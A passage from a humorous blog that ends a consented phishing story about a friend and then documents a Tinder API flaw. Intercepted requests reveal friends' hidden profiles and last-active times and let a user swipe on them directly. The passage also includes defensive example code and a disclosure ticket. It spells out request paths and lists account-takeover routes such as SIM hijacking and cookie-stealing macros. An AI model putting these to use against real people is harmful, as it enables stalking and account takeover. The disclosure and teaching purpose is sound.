<p><em>Damn RIGHT</em> this new profile strength is “Advanced.”</p>
<p>Please enjoy these half-baked opsec-enabled<sup id="fnref:opsec" role="doc-noteref"><a href="#fn:opsec" class="footnote" rel="footnote">26</a></sup> tweets<sup id="fnref:believe" role="doc-noteref"><a href="#fn:believe" class="footnote" rel="footnote">27</a></sup>.</p>
<p><img src="https://i.imgur.com/eNwheAO.png" alt="twitterbio" />
<img src="https://i.imgur.com/PE4IcF4.png" alt="waluigitweet" />
<img src="https://i.imgur.com/P4F6Vpp.png" alt="omg" />
<img src="https://i.imgur.com/Uo8aO3U.png" alt="hacked" />
<img src="https://i.imgur.com/07xgNIL.png" alt="waa" />
<img src="https://i.imgur.com/RuFsxTT.png" alt="greenboy" /></p>
<p>I also make Diana follow a bunch of Waluigi fan accounts (there are a <em>lot</em>), Nintendo of America, and @EmojiAquarium because it’s a damn good account.</p>
<h1 id="part-5-epilogue">Part 5: Epilogue</h1>
<p>Diana likes her new Waluigi life so much she keeps it all up there, and even changes her Facebook photo to a Waluigi’d one.</p>
<p>I meet up with her and ask her about her side of the story a few days later.</p>
<p>Here are some choice quotes:</p>
<p>“I’ve since listened to a <em>lot</em> of Waluigi songs”
“Waluigi is the ultimate symbol of postmodernism, he exists only as a foil”</p>
<p>I ask her “How do you think I did it?”. She says I must have hacked her email and reset her Twitter password, but she has no idea how I hacked her email.</p>
<p>When I show her the email chain with Kathleen on my computer her jaw drops for several seconds.</p>
<p>“You catfished me!”</p>
<p>We go back to the same ramen place after the interview. The credits roll.</p>
<h2 id="wait-but-i-am-very-afraid-after-reading-this-blog-post-how-do-i-not-get-360-noscope-hacked-like-diana-tho">“wait but i am very afraid after reading this blog post, how do I not get 360 noscope hacked like diana tho”</h2>
<p>Hey kids, it’s me, “Alex”. We’ve had a lot of fun today, but now it’s time to talk about the <em>real</em> issues. The moral of this story is that it’s really easy for someone else to know your password. Fret not, for you are young and extremely online, and it’s not too late for you yet.</p>
<p>Step 1: Go to https://haveibeenpwned.com and type in your email address. This doesn’t actually do anything, it’s just to instill sufficient fear in you.</p>
<p>Step 2<sup id="fnref:passwordmanagers" role="doc-noteref"><a href="#fn:passwordmanagers" class="footnote" rel="footnote">28</a></sup>: Go to your email and enable “Two-step Authentication”. You can go to <a href="https://www.google.com.au/landing/2step/">https://www.google.com.au/landing/2step</a> if you use gmail. If you use Hotmail then I dunno, there’s probably like a SkyCloud 360 X LIVE subscription you can buy that lets you do it.</p>
<p><img src="https://citwiki.oberlin.edu/images/2/29/Google-two-step-verification1.png" alt="2fa" /></p>
<p>Now, as well as your email password, you also type in a code from an app on your phone. Or you can have the code SMSed to you on your pastel-pink flip phone if you wanna relive the 90s<sup id="fnref:authapp" role="doc-noteref"><a href="#fn:authapp" class="footnote" rel="footnote">29</a></sup>.</p>
<p>If Diana had Verified Good Content Two-step Authentication turned on, then I would have had to get a two-factor code AND her password. I would have had to either:</p>
<ul>
<li>Phish the code as well as the password (but the code expires in less than 60 seconds)</li>
<li>Physically go to the same place as her, connect to the same WiFi, and steal her browser session</li>
<li>Email her a Word Doc with a macro in it that gives me control of her laptop, and steal her browser cookies from it</li>
<li>Call up her phone provider and trick them into pointing her phone number at my SIM card</li>
</ul>
<p>All of these are more work and higher risk, and so hackers often just move on to lower hanging fruit. That’s you in this situation. You’re the delicious fruit. And the hackers are…. giraffes? Yeah. Watch out for giraffes.</p>
<hr />
<p><em>Freshly baked shoutouts to My <a href="https://twitter.com/GracieNoLag">Absolute</a> <a href="https://twitter.com/adam_chal">Homeslices</a> for being my blog-review senpais, Diana for being chill, and to the hacking software released at DEFCON 25: Aerobatic dot io</em></p>
<p><em>If you want to talk to me about this, hit me up in the tweet zone: <a href="https://twitter.com/mangopdf">@mangopdf</a>.</em></p>
<div class="footnotes" role="doc-endnotes">
<ol>
<li id="fn:flubs" role="doc-endnote">
<p>A careless mistake <a href="#fnref:flubs" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:fate" role="doc-endnote">
<p>Obviously the best way is to not give permission to meeeeeeeee😎 <a href="#fnref:fate" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:findinglinkedin" role="doc-endnote">
<p>I found her LinkedIn by just googling her name #pwned <a href="#fnref:findinglinkedin" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:hackervoice" role="doc-endnote">
<p>wait did he just say “hacker voice I’m in”? <a href="#fnref:hackervoice" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:haventrealised" role="doc-endnote">
<p>I haven’t realised yet that successfully resetting Diana’s iCloud password would lock her out of her account and violate our agreement. This is because I’m a weapons-grade bozo. <a href="#fnref:haventrealised" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:fantasybeach" role="doc-endnote">
<p>On haveibeenpwned.com, Diana’s email address shows up in a data dump from this website. It’s a game of some sort? <a href="#fnref:fantasybeach" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:googledocs" role="doc-endnote">
<p>Later when I interview Diana, she says “I use exclusively Google Docs”, so I was right! No comment about the avocado thing. <a href="#fnref:googledocs" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:salted" role="doc-endnote">
<p>I’m not making these up, these are real words that real hackers use I swear. <a href="#fnref:salted" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:nolinkedin" role="doc-endnote">
<p>Diana didn’t have LinkedIn in 2012, so she’s not in the list. But some of the 20 people who had the same password as her sure did. <a href="#fnref:nolinkedin" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:insecure" role="doc-endnote">
<p>tag urself lol <a href="#fnref:insecure" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:passwordguessing" role="doc-endnote">
<p>I also try guessing what her password could be based on the password I already have for her (<code class="language-plaintext highlighter-rouge">qwerty1</code>) but it doesn’t work. <a href="#fnref:passwordguessing" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:pretty" role="doc-endnote">
<p>low <a href="#fnref:pretty" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:easy" role="doc-endnote">
<p>effort <a href="#fnref:easy" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:myhotmail" role="doc-endnote">
<p>From 2002 do NOT @ me <a href="#fnref:myhotmail" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:loggedin" role="doc-endnote">
<p>This makes <em>no sense</em>, since she’ll be reading her Hotmail, and then asked to log in to <em>the same thing she’s already reading</em>, but NON-fake websites have bad enough UX that this is believable. <a href="#fnref:loggedin" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:goodstuff" role="doc-endnote">
<p>I steal all that good stuff after the URL from the Google sign-in page <code class="language-plaintext highlighter-rouge">;>_></code> <a href="#fnref:goodstuff" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:loginscreen" role="doc-endnote">
<p>Awkwardly, Hotmail changed its login screen shortly before this blog post came out. It <em>used</em> to look like that I swear. <a href="#fnref:loginscreen" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:attention" role="doc-endnote">
<p>There are a few reasons this email wasn’t attention grabbing. It was automated, from a company (not an actual human), and wasn’t specifically about her, but about her account. <a href="#fnref:attention" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:lookupthecompany" role="doc-endnote">
<p>When I interview her later, Diana says she looked up the company! She even says that getting back to Kathleen was on her to-do list, the poor thing. <a href="#fnref:lookupthecompany" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:glance" role="doc-endnote">
<p>Months later, I notice I’ve left a “Lorem ipsum dolor sit amet, consectetur adipiscing elit” as a dot point on the resume. <a href="#fnref:glance" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:suggestion" role="doc-endnote">
<p>This is a genius suggestion from one of my <a href="https://twitter.com/GracieNoLag">~<em>hacker connections</em>~</a>. <a href="#fnref:suggestion" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:gaslighted" role="doc-endnote">
<p>At this point Diana has been completely gaslighted as to what her hotmail password is, because my phishing site said the wrong password was right, and then said the right password was wrong, and she thinks it’s the real Hotmail. <a href="#fnref:gaslighted" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:gov1" role="doc-endnote">
<p>I mean it WOULD be pretty funny <a href="#fnref:gov1" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:gov2" role="doc-endnote">
<p>And wow you could do anything, book flights, get a job, change your name… <a href="#fnref:gov2" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:gov3" role="doc-endnote">
<p>Just letting any Government Agents reading this know that I did NOT end up doing anything with this and I love democracy. <a href="#fnref:gov3" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:opsec" role="doc-endnote">
<p>If you <em>really</em> tried you could probably find Diana’s Twitter from these. You would then be a hacking genius, binary flowing through your veins, and have a CVE number assigned to your personally. I, a humble wannabee, am relying on your strict ethics to prevent you from, uh, stalking the friend of some guy whose blog post you read. You can do it. I believe in you. <a href="#fnref:opsec" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:believe" role="doc-endnote">
<p>Having said that, I don’t <em>really</em> have an overwhelming amount of faith in the idea that someone won’t try to do that. You can stay chilled out, dear reader, since before this blog was published Diana and I had a nice chat and fixed up her personal security. <a href="#fnref:believe" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:passwordmanagers" role="doc-endnote">
<p>Password managers like <a href="https://lastpass.com">LastPass</a> are also good for giving you unique passwords, but I reckon 2FA is the best effort:security ratio value For Normal People Tee Em. <a href="#fnref:passwordmanagers" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:authapp" role="doc-endnote">
<p>But, this is less secure, since your phone number can still be hijacked. <a href="#fnref:authapp" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
</ol>
</div>
<hr />
<h1 id="stalking-your-facebook-friends-on-tinder">Stalking your Facebook friends on Tinder</h1>
<p><em>mangopdf, 2016-07-21. It’s probably easier if you just read it. Salty Hacker News comments.</em></p>
<p>Whoa hello hey look I think I made a thing that lets you see the Tinder
profiles of your Facebook friends. That’s Tinder photos, bios, and the last
time they were on Tinder. You can also swipe right on their Tinder profiles,
even if Tinder doesn’t suggest them to you. I think this has some pretty
~spooky~ privacy implications, and this post is about how it works.</p>
<p>I told Tinder that I found this thing, and they said it was a feature, not a
bug. If you want to skip the blog post and just get straight to swiping right
on your friends and downloading their Tinder profiles, <a href="https://github.com/defaultnamehere/tinder-detective">here’s the GitHub
repository</a>.</p>
<p>Otherwise… Get ready for some texttttttt</p>
<hr />
<p>Hey what up it’s me ya friendly neighbourhood homeslice Alex comin’ atcha’
LIVE with some phresh new #content. That’s <em>right</em> it’s the inevitable
disappointing sequel to <a href="https://mango.pdf.zone/graphing-when-your-facebook-friends-are-awake">“Graphing when your Facebook friends are awake”</a>
streamed to your screen in HIGH DEFINITION TEXT.</p>
<p>For the sake of helping you find the parts of this post that are <em>not</em>
gratuitous gags (it’s easier that way), I’ve put the important parts <strong>in
bold</strong>. I have also put <em>some parts</em> in <em>italics</em> for <em>emphasis</em> and other times
<em>as a quote</em>. I’ve also noticed that sometimes things are in bold <strong>or</strong>
<em>italics</em> <strong>seemingly at random</strong>, <em>overall</em> reducing the <strong>helpfulness</strong> of the
whole thin<strong>g</strong>.</p>
<h2 id="im-a-time-traveller-from-2004-and-i-dont-know-what-tinder-is">I’m a time traveller from 2004 and I don’t know what Tinder is</h2>
<p>Invest now in emoji they’re gonna be BIG.</p>
<p>Tinder is a “Lifestyle” app (apps are like websites but worse) that lets you
‘Anonymously “like” or “pass” people Tinder suggests’. I read it on the login
screen to their app so it must be true.</p>
<p>Now that we’re all up to speed, you know how Tinder has profiles? They’re the
page someone looks at when they decide whether to swipe left or right on you.
Normally you only appear to people that Tinder chooses to show your profile
to. Anyway so one day my phone rings and it’s President Obama saying “Alex my
son you absolute ledge, go see if Tinder has any weird secret APIs you can use
to do something cool idk” and I was all “rest easy baz m8 I’m on the case”</p>
<h2 id="story-time">Story time</h2>
<p>Cut to me in my room. I’m about to try and “do hacking”. Around me are two
computer monitors, two laptops, and no friends. It’s 10pm on a Saturday night
and I’ve decided that I want to poke around on Tinder (not like that) and see
if I can find anything interesting (also not like that).</p>
<p>The first step is to use the Tinder app and see what the app does, in the
hopes of catching it doing something silly.</p>
<p>But I don’t have a Tinder account, and I don’t plan to. (But it’s okay if
<em>you</em> use Tinder. That’s not what this post is about.)</p>
<p>The only way to sign up for a Tinder account is by signing in with your
Facebook account, but I don’t want to use mine. I happened to have an
absolutely true blue <a href="https://www.facebook.com/terms">Terms-of-Service-Compliant</a> <em>spare</em> Facebook account lying
around, so I made a Tinder account with this Facebook account. I had to pick a
profile photo for the account so I picked uhhhhhhh</p>
<p><img src="/img/2016-07-21-stalking-your-facebook-friends-on-tinder/c8dd3f93a079f3b3e5b0f7c2057d4254598bf6f25663ef39469748deac2f9fa3.jpg" alt="image" /></p>
<p>I have alarmingly little justification for this so it’s probably better if you
just keep reading.</p>
<h2 id="mad-dawg-y-dawg-31337-el8-hacking-sk1llz">Mad-dawg-y dawg 31337 el8 hacking #sk1llz</h2>
<p>I wanted to see what the Tinder app was doing behind the scenes, kinda like
how you can put on your hoodie, yell “hold my calls” to nobody in particular,
click <em>“Inspect Element”</em> on a web page, and call yourself a hacker. This will
let you see all the stuff that the page is sending and receiving and also
finally make people respect you for the edgelord you are. You can’t <em>“Inspect
Element”</em> on an app, so I used <a href="https://mitmproxy.org/">mitmproxy</a> to spy on
my phone.</p>
<p>mitmproxy is an elite hacker tool that lets me view data the Tinder app was
sending to and from my phone and increases my fedora size by 7000%. I
installed mitmproxy’s provided 103% legit artisanal HTTPS certificate to my
phone, which gives me the master keys to decrypt whatever my phone sends to
and from Tinder servers. I go and edit my phone’s WiFi proxy settings to say
<em>“HEY big guy you know how you thought that the internet was over THERE well
actually my laptop is the internet so you can just send all your data there
instead okay yeah sick one”</em>. Since my phone is now politely sending all the
good stuff to my laptop instead of my router, I can use my laptop to spy on
all the internet connections my phone is making.</p>
<p><img src="/img/2016-07-21-stalking-your-facebook-friends-on-tinder/a1330752ffee8c258a014acb540961102f7cdd985c9b2079b9c010e175e3c0bc.png" alt="image" /></p>
<p>Here we can see that my phone is talking to an API at api.gotinder.com. It’s
telling Tinder “hey, I’m online and about to start swiping furiously so I hope
<a href="http://tech.gotinder.com/caching-architectures/">your AWS load-balancers</a> are
ready for this”, and asking the server for a list of faces to swipe. It’s also
sending some gentle analytics like where I am, the make and model of my phone,
who my phone provider is, and whether I have Tinder Plus, the Money Edition of
Tinder.</p>
<p><img src="/img/2016-07-21-stalking-your-facebook-friends-on-tinder/7229afc95992adf646b345b6e7676cba410a59d18ed865a3aeaccc7c56ae69a0.png" alt="image" /></p>
<p>At this point, like in general, I don’t really know what I’m looking for or
even how this app works. There’s something about swiping people right.
Sometimes you let your friends use your account to chat with strangers. That’s
all I got. The app seems to aggressively want me to be excited about it but
I’m confused. I’m just here to try to catch this app doing something silly
behind the scenes and try and fix it.</p>
<hr />
<p>Since I don’t know what I’m looking for, I try everything. I change <em>all</em> the
settings. I’m now a 20 year-old Flamingo interested in Men and Women from age
18 to 30 from up to 100km away (roughly 200,000 “Make America Great Again”
hats laid end-to-end if you only know Freedom Units and need to visualise).
The first time someone’s face comes up I mess up and can’t figure out which
way is “right” and accidentally “pass” them. The app says “NOPE!” and I see
their face fade into the void. I’m already a judgement <em>machine</em> and I haven’t
even started. I furiously spam “Like” on a bunch of faces in the hopes that
someone will also “Like” my high-resolution flamingo picture. If someone
“matches” with me I’ll be able to chat with them, and a whole other section of
the app to poke around in will open up.</p>
<p>Nobody will ask any questions about the fact that my profile has only a single
photo, it’s of a flamingo, and that my bio is just “Flamingooooo”.</p>
<hr />
<p>Look I really thought my flamingo idea was going to be a good one but nobody
liked me back.</p>
<p><em>Fiiiiiiiiiine.</em></p>
<p>I googled “stock photos faces” and picked one of a lady in a hat. Yeah. A hat.
That’ll work. I cropped the photo slightly and added a subtle filter to
attempt to fool the most basic of reverse image searchers and then realised
that I really should probably consider going outside more I hear it’s pretty
high-resolution out there too.</p>
<p>Instead I go back to the Android guest user I’ve added to my phone with the
disposable email address the Facebook account uses. I set my phone to use my
laptop as a proxy, sending all traffic to the laptop before it hits the
internet so I can spy on myself. I change my photo to the hat lady and spam
some swipes right on some faces.</p>
<p>Almost <em>immediately</em> I’m informed that “It’s a match!” in some hipster cursive
font. (Probably <a href="http://www.dafont.com/lobster.font">Lobster</a>. Have you seen
that thing it’s <a href="https://emojityper.com">everywhere</a>.) My choices are “Send
a message” or “Keep swiping” (Fun fact, in an earlier version of the app,
“Keep swiping” read “Keep playing”.) I pick “Send a message”. I spy on the
network requests that the chat part of the app does but I can’t see the actual
message text for some reason. Is it not being sent over HTTP? Some other
protocol? Is it doing some XMPP or websockets sacrificial ritual? Is it
converting each message to base64, storing that base64 in italics in Times New
Roman in a PDF, inserting that PDF into a cell in a Microsoft Excel 2003
spreadsheet and ROT13-ing the whole thing? I’ll never know, I gave up and
stumbled on a way better feature.</p>
<h2 id="ive-always-wanted-tinder-in-group-form">“I’ve always wanted Tinder in group form”</h2>
<p>We’ve all felt it at one time or another. Good news. It’s finally here. If you
live in Australia like me, your Tinder account will have an option to check
out “Tinder Social”.</p>
<p><img src="/img/2016-07-21-stalking-your-facebook-friends-on-tinder/20e3004585f5f2c6a2119c28f169c15c8793dccdb5ca86646c809bd1d4cbc4ef.jpg" alt="image" /></p>
<p>Tinder Social is the whole swiping-chatting-meeting-up experience, but now
it’s with <em>groups</em> of people and you’ll have a <em>perfect</em> moment to spam “when
the whole squad is on point”.</p>
<p>That’s right, you too can exchange four messages with a group of stock photos,
just like the lucky folks in this mockup.</p>
<p>I took the picture above from Tinder’s <a href="http://blog.gotinder.com/introducing-tinder-social/">announcement blog
post</a>. I noticed that one
of the photos in this mockup is the same stock photo I used for my non-flamingo
Tinder photo and the internet feels a little smaller.</p>
<p>You might have a lot of <em>feelings</em> about this particular feature of Tinder,
and that’s okay with me. This blog post is long enough as it is though, and
you probably have to get going soon since you left something in the oven or
something, so I’m just going to move on if that’s alright with you.</p>
<hr />
<p>Because Tinder is really on the fence about whether it’s a parody of itself or
not, internally the app calls groups “squads”. Here’s an example:</p>
<blockquote>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"squads_discoverable": false,
"squads_only": false,
"can_create_squad": true
</code></pre></div> </div>
</blockquote>
<p>There’s really nothing I can say here so let’s just enjoy this special moment.</p>
<hr />
<p>If you haven’t heard of Tinder Social, it’s because it’s only in Australia for
now “as a test”. If it works Tinder might roll it out to the rest of the
world. (UPDATE: Plot twist, it launched in the US the same day this blog post
came out! See the bottom of this post for details.)</p>
<p>That’s right, Australia-production is <em>basically</em> a staging server at this
point. “We’ll just yolo-deploy this 176% legit “Tinder for Squads” to uhhh I
dunno let’s go with uhhhh Australia <em>just as a test</em> and if it works, great,
but if it turns out to be bad NO WORRIES MATES IT’S JUST <em>AUSTRALIA</em> LOL”.
What the <em>heck</em> Tinder I can’t believe you chose the <em>continent of Australia</em> as the A in your A/B test. What, do you think we’re second-class internet
citizens just because our internet is desperately struggling to hold up under
the weight of Netflix and it’s probably faster and cheaper to send a big file
to your mate on the other side of the country via a Kangaroo with a pouch full
of MicroSD cards than attempting to upload anything faster than 700Kbps? Even
if the Kangaroo gets lost and goes on a Pokewalk and is all like “hey guys
guess what I found a ZUBAT” then it’s STILL going to be faster than looking at
a website, your eyes wide in innocent horror being like “but I don’t
understand. Why isn’t uploading? Did I do something wrong? Did I break the
app?”. But it’s not your fault. Dry your eyes. I’m not crying. You’re crying.</p>
<h2 id="hey-ive-been-reading-this-for-like-a-long-time-can-you-get-to-the-stalking">Hey I’ve been reading this for like a long time can you get to the stalking my friends thing now?</h2>
<p>Sorry it’s just that I get a bit s̫ͅt̀͊ͬr͒e̗̎s̠ͭͫseͧd͛͟ sometimes ya feel?</p>
<p>There’s no concept of “friends” on Tinder, only people who you have “matched”
with. So Tinder Social shows you your Facebook friends on Tinder and lets you
choose from them who to add to your group.</p>
<p><img src="/img/2016-07-21-stalking-your-facebook-friends-on-tinder/37d7cc91dc609517a090314b5e34bb8db52b3ac4a4ae889fe5d4932bac6c2ba7.png" alt="image" /></p>
<p>In the app you don’t see anything other than names and Facebook profile
pictures for your friends. But let’s just casually point mitmproxy at the
Tinder app while it brings up the “choose friends” screen.</p>
<blockquote>
<p>GET <strong>https://api.gotinder.com/group/friends</strong></p>
</blockquote>
<p>{"status":200,"results":[{"<strong>user_id</strong>":"<strong>562…….ec8</strong>","name":"[redacted]","photo":[{"processedFiles":…{"url":"https://graph.facebook.com/[redacted]/picture?height=640&amp;width=640","height":640,"width":640}]}],"in_squad":false}</p>
<p>Mostly this is just names and profile photos of your Facebook friends, which
is nothing you couldn’t get from the official Facebook API. This data is from
a fake Tinder account I created to test my idea. But what about this part?</p>
<blockquote>
<p>"<strong>user_id</strong>":"<strong>562…….ec8</strong>"</p>
</blockquote>
<p>That’s the Tinder user id of this Facebook friend. (I’ve cut out some of it so
you can’t go stalking this account.) This id uniquely identifies a Tinder
account. Surely it can’t be THAT easy. Can it? What do you think? Vote on your
phones now!</p>
<hr />
<p>If you send:</p>
<blockquote>
<p>GET https://api.gotinder.com/user/562…….ec8</p>
</blockquote>
<p>Then Tinder sends back:</p>
<blockquote>
<p>{'_id': '562…….ec8',<br />
'bio': "hi every1 im new!!!!!!! holds up spork my name is katy but u
can call me t3h PeNgU1N oF d00m!!!!!!!! lol…as u can see im very
random!!!!",<br />
'birth_date': '1995-07-19T02:52:04.083Z',<br />
'birth_date_info': 'fuzzy birthdate active, not displaying real
birth_date',<br />
'common_friends': [&lt;common Facebook friends go here&gt;],<br />
'common_likes': [&lt;common Facebook likes go here&gt;],<br />
'connection_count': [the number of people you’ve swiped (I think?) go
here],<br />
'distance_mi': 1, // How far the person is from you right now<br />
'gender': 1, // 1 is female, 0 is male. C’mon Tinder that’s not how
gender works<br />
'name': 'Victoria', // Note that there’s no last name<br />
'ping_time': '2016-07-16T02:51:45.475Z', // The last time the person was
on Tinder</p>
</blockquote>
<p>Yeah look I know you probably didn’t read that so let me explain. No no, it’s
fine, you don’t have to go back and read it now. It’s really no trouble.</p>
<p>If we have someone’s Tinder id, we can see:</p>
<ul>
<li>Tinder photos</li>
<li>Tinder bio (a short “about me”)</li>
<li>The last time they were on Tinder</li>
<li>How many people they’ve swiped (I think??)</li>
<li>A few other things, but you already knew them from Facebook</li>
</ul>
<p>Hey, look, you can see the last time someone was on Tinder.</p>
<p>According to Tinder, this feature is disabled. Here’s a screenshot <a href="https://www.gotinder.com/faq">of their
support page.</a></p>
<p><img src="/img/2016-07-21-stalking-your-facebook-friends-on-tinder/b6ebf2fadd657a7e77460259d12a3d16f71daa00ae20e592586d38865d3d38cc.png" alt="image" /></p>
<p>I guess they only disabled it in the app screens, rather than changing what
the server sends to your phone.</p>
<p>Why, with information like that you could make graphs of when your
friends are using Tinder, and probably find out all sorts of interesting
things. Who <em>knows</em> what that information correlates with? Just an idea.</p>
<p>And hey, once you have someone’s Tinder user id, <strong>you can use the official
unofficial API to swipe left or right on them</strong> without waiting for them to
appear in the stream of people Tinder suggests to you.</p>
<p>You can swipe left or right on them like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GET https://api.gotinder.com/{like|pass}/{id}
</code></pre></div></div>
<p>I’m not sure about this, but it looks like people who have swiped right
on you appear earlier in the list of people Tinder suggests. So what I’m
saying here, is maybe you can <em>force</em> Tinder to let you “like” one of your
Facebook friends on Tinder? Then you’ll probably appear in their suggestions,
and if they “like” you back then you can just be like “haha wow fancy seeing
you on tinder” YOU SMOOTH CRIMINAL YOU ( ͡° ͜ʖ ͡°)</p>
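<p>Two fixes fall out of the above (and out of the bug report further down): the <em>server</em>, not the app screen, has to drop fields like <code>ping_time</code> that the product says are disabled, and <code>/user/{id}</code> should only answer for people the requester has actually been shown or matched with, so knowing an id is not enough. Here is that pattern as an added example written for this page. It is not Tinder’s code and not the tinder-detective tool; the function names and the little in-memory tables are this example’s own, and the profile records are constructed with fake values in the shape of the response quoted above.</p>

```python
import copy
from typing import Optional

# Fields the profile card is actually meant to show.
VISIBLE_FIELDS = {"_id", "name", "bio", "distance_mi"}

# Constructed sample records (fake values; the shape borrows the field names
# from the /user/{id} response quoted in the post). `social_opt_out` stands
# for the "opt out of Tinder Social in Settings" control mentioned in
# Tinder's reply; the key name is this example's own.
PROFILES = {
    "u-alice": {
        "_id": "u-alice", "name": "Alice", "bio": "likes hats",
        "birth_date": "1990-01-01T00:00:00.000Z", "connection_count": 1979,
        "distance_mi": 1, "gender": 1,
        "ping_time": "2016-07-16T02:51:45.475Z", "social_opt_out": False,
    },
    "u-bob": {
        "_id": "u-bob", "name": "Bob", "bio": "is this app like twitter",
        "birth_date": "1987-07-01T00:00:00.000Z", "connection_count": 12,
        "distance_mi": 3, "gender": 0,
        "ping_time": "2016-07-15T22:10:00.000Z", "social_opt_out": True,
    },
    "u-carol": {
        "_id": "u-carol", "name": "Carol", "bio": "Flamingooooo",
        "birth_date": "1992-03-03T00:00:00.000Z", "connection_count": 400,
        "distance_mi": 60, "gender": 1,
        "ping_time": "2016-07-10T09:00:00.000Z", "social_opt_out": False,
    },
}

# Constructed relationship tables: Facebook friendships, which profiles the
# recommender has already shown to whom, and matches (unordered pairs).
FACEBOOK_FRIENDS = {"u-me": {"u-alice", "u-bob", "u-carol"}}
SUGGESTIONS = {"u-me": {"u-alice"}}
MATCHES = {frozenset({"u-me", "u-bob"})}


def leaky_get_profile(target_id: str) -> Optional[dict]:
    """The 'before': any caller with any id gets the whole stored record.
    Hiding ping_time in the app screens changes nothing here."""
    profile = PROFILES.get(target_id)
    return copy.deepcopy(profile) if profile else None


def get_profile(requester_id: str, target_id: str) -> Optional[dict]:
    """The 'after': authorise first, then project to the visible fields."""
    profile = PROFILES.get(target_id)
    if profile is None:
        return None
    suggested = target_id in SUGGESTIONS.get(requester_id, set())
    matched = frozenset({requester_id, target_id}) in MATCHES
    if not (suggested or matched):
        return None  # same answer as "no such user": no id-probing oracle
    return {k: v for k, v in profile.items() if k in VISIBLE_FIELDS}


def friends_on_tinder(requester_id: str) -> list:
    """The Tinder Social friend picker: display names only, honouring opt-out.
    Deliberately no profile user id, since that is the handle the leaky
    endpoint accepted; whatever the group-building flow uses instead must
    not be accepted by /user/{id} (that part is out of scope here)."""
    names = []
    for friend_id in FACEBOOK_FRIENDS.get(requester_id, set()):
        profile = PROFILES.get(friend_id)
        if profile and not profile["social_opt_out"]:
            names.append(profile["name"])
    return sorted(names)


if __name__ == "__main__":
    print("leaky:", leaky_get_profile("u-alice"))
    print("fixed, suggested:", get_profile("u-me", "u-alice"))
    print("fixed, matched but opted out of Social:", get_profile("u-me", "u-bob"))
    print("fixed, friend only:", get_profile("u-me", "u-carol"))
    print("friend picker:", friends_on_tinder("u-me"))
```

<p>Note the split: opting out of Tinder Social only governs the friend picker, while the profile endpoint is gated on suggestion or match regardless, so Carol (a friend who never opted out) shows up in the picker by name but her profile is not served, and Bob (opted out, but matched) is served only the visible fields.</p>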
<hr />
<h2 id="responsible-disclosure">“Responsible” disclosure</h2>
<p>tl;dr I tried to tell Tinder about this before I wrote this blog post but they
were all like:</p>
<p>¯\_(ツ)_/¯</p>
<p>You can skip this section if you don’t want to read a bug report. It’s okay. I
don’t mind. I’ll see you in the next section.</p>
<hr />
<p>This isn’t much of a “security vulnerability”, and it certainly doesn’t
deserve its own cool and funky name like
<a href="http://heartbleed.com/">Heartbleed</a>. But I thought I’d report it anyway, just
in case Tinder didn’t know about it.</p>
<p>I looked around on their site but I couldn’t find a “Security” section so I
just made a support ticket.</p>
<p>Here’s what I sent them in full (feel free to skip this):</p>
<p><em>This isn’t actually a support request. I actually want to report a security</em>
<em>vulnerability, but I couldn’t find where to do so.</em></p>
<p><em>Would you mind forwarding this to your security team? Thank you! <3</em></p>
<p><em>I found that I can find the Tinder profiles of any of my Facebook friends</em>
<em>who use Tinder.</em>
<em>This can all be done through the (un)official API, so I’m assuming it’s a</em>
<em>“feature” not a bug.</em></p>
<p><em>Steps to reproduce:</em></p>
<p><em>GET <code class="language-plaintext highlighter-rouge">api.gotinder.com/group/friends</code></em>
<em>-> Returns Tinder user ids for all my Facebook friends that have Tinder</em></p>
<p><em>GET <code class="language-plaintext highlighter-rouge">api.gotinder.com/user/&lt;id&gt;</code></em>
<em>-> Returns, among other things, something like:</em></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> connection_count":1979...._id":"&lt;tinder
user id&gt;","badges":[],"bio":"i dont get it is this app like twitter"
","birth_date":"1987-07-[redacted]","gender":0,"name":"[redacted]",
"ping_time":"[utc one second resolution timezoned timestamp]
</code></pre></div></div>
<p><em>I think that you don’t want to expose that information about my Facebook</em>
<em>friends to me.</em></p>
<p><em>If this behaviour is intentional:</em>
<em>Sure, it’s your app.</em>
<em>Please reply to this ticket letting me know.</em></p>
<p><em>If this behaviour is not intentional:</em>
<em>You should change it!</em>
<em>I recommend not having profile information available at /user/&lt;id&gt;, or</em>
<em>limiting it only to users that have been suggested to me.</em></p>
<p><em>Please reply promptly if you’d like me to keep this secret, since because I</em>
<em>think you think this is a feature not a bug, I’ll probably blog about it</em>
<em>publicly soon.</em></p>
